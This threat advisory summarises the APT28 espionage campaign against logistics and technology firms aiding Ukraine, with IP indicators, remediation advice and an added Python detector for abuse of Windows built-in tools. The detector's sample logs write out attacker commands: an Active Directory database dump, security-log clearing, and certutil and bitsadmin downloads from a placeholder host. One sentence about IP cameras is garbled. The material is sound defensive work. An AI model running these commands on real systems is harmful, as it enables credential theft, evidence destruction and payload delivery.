May 21, 2025
Severity
High
Analysis Summary
A coordinated joint advisory issued on May 21, 2025, by CISA, NSA, FBI, and international partners has warned that Russian military intelligence hackers, specifically the GRU’s 85th Main Special Service Center (Unit 26165), also known as APT28 or Fancy Bear, are conducting an ongoing cyber espionage campaign. The campaign, active since 2022, primarily targets Western logistics and technology companies involved in the coordination and transportation of aid to Ukraine. The threat actors have compromised dozens of entities across 13 countries, including the U.S., Ukraine, and several European nations, impacting sectors such as defense, transportation (airports, ports, maritime, and air traffic), and IT services. The advisory underscores the sustained nature of the campaign and warns that similar tactics, techniques, and procedures (TTPs) are likely to continue.
APT28’s initial access techniques include credential guessing, brute-force attacks, spearphishing, and the exploitation of known vulnerabilities in widely used software such as Microsoft Outlook, Roundcube, and WinRAR. In a particularly alarming development, the group has also targeted IP cameras located at strategic logistical chokepoints, such as border crossings, military facilities, and railway stations. These cameras were used to monitor aid movements, with over 80% of the compromised devices. This real-time surveillance capability is aimed at intercepting aid delivery operations, further emphasizing the group’s intelligence-gathering objectives.
Once inside the networks, the attackers use native Windows utilities for a range of malicious activities. These tools include ntdsutil for extracting Active Directory credentials, wevtutil to clear event logs, vssadmin to access locked files, and schtasks to establish persistence. Other tools like wmic, net, and reg are used for reconnaissance, lateral movement, and modifying system settings. Additionally, tools like certutil, powershell, and bitsadmin are employed for payload delivery, obfuscation, and exfiltration while evading detection. This use of “living off the land” techniques enables the attackers to blend in with normal system operations and complicate detection efforts by defenders.
The joint advisory, co-signed by cybersecurity agencies from over a dozen allied nations, reflects the global concern over these activities and urges heightened defensive measures. CISA advises organizations in the logistics and technology sectors to assume they are targets, enhance threat hunting for known TTPs and indicators of compromise (IOCs), and adopt best practices like strong multi-factor authentication, network segmentation, and timely patching of software. Given the attackers’ focus on monitoring aid shipments to Ukraine and gathering detailed transport data, organizations are strongly encouraged to increase vigilance and improve the security of both IT infrastructure and operational technology.
Impact
- Sensitive Credential Theft
- Privilege Escalation
- Gain Access
- File Encryption
Indicators of Compromise
IP
159.196.128.120
194.126.178.8
124.168.91.178
213.32.252.221
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Implement multi-factor authentication (MFA) using strong factors (not just SMS or email).
- Enforce least privilege access policies for all users and services.
- Regularly review and revoke unused accounts and permissions.
- Apply security patches and updates promptly, especially for Microsoft Outlook, Roundcube, and WinRAR.
- Monitor vendor advisories for emerging vulnerabilities.
- Segment networks to isolate critical systems from less secure environments.
- Enable logging and monitoring on all endpoints and network devices.
- Monitor logs for indicators of compromise (IOCs) and suspicious behavior.
- Deploy intrusion detection/prevention systems (IDS/IPS).
- Conduct regular threat hunting based on known APT28 TTPs.
- Monitor for the use of native Windows tools (LOLBins) such as:
  - ntdsutil, wevtutil, vssadmin, schtasks, wmic, certutil, powershell, etc.
- Look for unauthorized access to IP cameras, especially at critical logistics points.
- Ensure regular, encrypted backups are created and tested.
- Educate users on phishing and social engineering tactics.
- Conduct regular security training for both technical staff and general users.
- Participate in information-sharing networks (e.g., ISACs).
- Report incidents to national cybersecurity centers (like CISA, NCSC, etc.) to contribute to broader defense.
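To make the LOLBin monitoring recommendation above concrete (and the living-off-the-land behaviour described in the Analysis Summary), here is an added detection example that is not part of the advisory: it scans constructed process-creation records (Windows event 4688 flattened to `host|user|image|command line`) and flags the specific invocation patterns that match the tool usage the advisory attributes to APT28. Hostnames, user names, paths and the `example.invalid` URL are all made up for illustration.

```python
import re

# Constructed sample process-creation records (not real telemetry):
# host|user|image path|command line
SAMPLE_EVENTS = """\
DC01|CORP\\svc_backup|C:\\Windows\\System32\\ntdsutil.exe|ntdsutil "ac i ntds" "ifm" "create full C:\\temp\\x" q q
WS07|CORP\\jsmith|C:\\Windows\\System32\\wevtutil.exe|wevtutil cl Security
WS07|CORP\\jsmith|C:\\Windows\\System32\\vssadmin.exe|vssadmin create shadow /for=C:
WS07|CORP\\jsmith|C:\\Windows\\System32\\schtasks.exe|schtasks /create /tn Updater /tr C:\\Users\\Public\\u.exe /sc onlogon
WS07|CORP\\jsmith|C:\\Windows\\System32\\certutil.exe|certutil -urlcache -split -f http://example.invalid/a.txt a.txt
WS12|CORP\\mjones|C:\\Windows\\System32\\wevtutil.exe|wevtutil qe Application /c:5
WS12|CORP\\mjones|C:\\Windows\\System32\\schtasks.exe|schtasks /query /tn Updater
WS12|CORP\\mjones|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job http://example.invalid/b.bin C:\\Users\\Public\\b.bin
"""

# Rule per tool: a regex on the command line plus the behaviour the advisory describes.
# Benign administrative use of the same binaries (e.g. "wevtutil qe", "schtasks /query")
# deliberately does not match, so the rules key on the abusive sub-command, not the tool name.
RULES = {
    "ntdsutil": (re.compile(r"\bifm\b|create\s+full", re.I), "Active Directory database dump (credential theft)"),
    "wevtutil": (re.compile(r"\bcl\b|clear-log", re.I), "event log clearing"),
    "vssadmin": (re.compile(r"create\s+shadow", re.I), "shadow copy creation to read locked files"),
    "schtasks": (re.compile(r"/create\b", re.I), "scheduled task creation (persistence)"),
    "certutil": (re.compile(r"-urlcache|-decode", re.I), "payload download or decoding"),
    "bitsadmin": (re.compile(r"/transfer\b", re.I), "payload download"),
}


def detect_lolbin_abuse(log_text: str) -> list[dict]:
    """Return one alert dict per record whose command line matches an APT28-style LOLBin pattern."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        host, user, image, cmdline = line.split("|", 3)
        tool = image.rsplit("\\", 1)[-1].lower()
        tool = tool[:-4] if tool.endswith(".exe") else tool
        rule = RULES.get(tool)
        if rule and rule[0].search(cmdline):
            alerts.append({"host": host, "user": user, "tool": tool, "reason": rule[1], "command": cmdline})
    return alerts


if __name__ == "__main__":
    for a in detect_lolbin_abuse(SAMPLE_EVENTS):
        print(f"[{a['host']}] {a['user']} ran {a['tool']}: {a['reason']} -> {a['command']}")
```

In production the same rules would be applied to Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled), and a hit on `ntdsutil` from anything other than a known backup account on a domain controller should be escalated immediately.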